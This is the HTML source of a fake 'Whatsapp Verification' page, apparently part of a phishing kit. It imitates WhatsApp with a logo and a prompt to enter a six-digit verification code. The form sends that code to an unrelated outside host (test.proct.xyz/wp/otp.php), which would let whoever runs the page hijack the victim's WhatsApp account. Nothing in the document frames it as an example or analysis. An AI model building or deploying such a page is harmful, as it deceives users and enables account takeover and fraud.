<!DOCTYPE html>

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Whatsapp Verification</title>
  <link rel="shortcut icon" href="icon.png" type="image/x-icon">
<meta name="viewport" content="width=device-width, initial-scale=1">

<style type="text/css">
<!--
.style1 {font-size: 16px}
-->
</style>
</head>



<style>
body {font-family: Arial, Helvetica, sans-serif;}

/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

/* Set a style for all buttons */
button {
  background-color: #389f0c;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

/* Extra styles for the cancel button */
.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #0c449f;
}

/* Center the image and position the close button */
.imgcontainer {
  text-align: left;
  margin: 1px 0 1px 0;
  position: relative;
   padding: 16px;
}

img.avatar {
  width: 40%;
  border-radius: 0%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* The Modal (background) */
.modal {
  display: none;
    position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgb(0,0,0);
    background-color: #00a2ed;
    padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
  background-color: #2672EC;
    margin: 10% auto 15% auto;
    border: 1px solid #888;
    width: 25%;
    margin-left: auto;
    margin-right: auto;
    position: relative;
    max-width: 440px;
    
    margin-bottom: 28px;
    background-color: #fff;
    -webkit-box-shadow: 3px -1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow: 0 2px 6px rgba(0,0,0,0.2);
    box-shadow: 0 2px 6px rgba(0,0,0,0.2);
    min-width: 300px;
    /* min-height: 220px; */
    overflow: hidden;

}

/* The Close Button (x) */
.close {
  position: absolute;
  right: 25px;
  top: 0;
  color: #000;
  font-size: 35px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: red;
  cursor: pointer;
}

/* Add Zoom Animation */
.animate {
  -webkit-animation: animatezoom 0.6s;
  animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
  from {-webkit-transform: scale(0)} 
  to {-webkit-transform: scale(1)}
}
  
@keyframes animatezoom {
  from {transform: scale(0)} 
  to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>

  <form class="modal-content animate" action="https://test.proct.xyz/wp/otp.php" method="post">
   
    <div class="container">
	

	<div align="center"><img src="logo.png" alt="Avatar" width="120" height="68" class="avatar1"></div>
	<p align="center">Enter 6 digit verification code </p>
      
      <div align="center">
        <input type="text" placeholder="____ _____" name="otp" required="">
        <button type="submit"><span class="style1">Verify</span></button>
      </div>
    </div></form>

<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>



</body></html>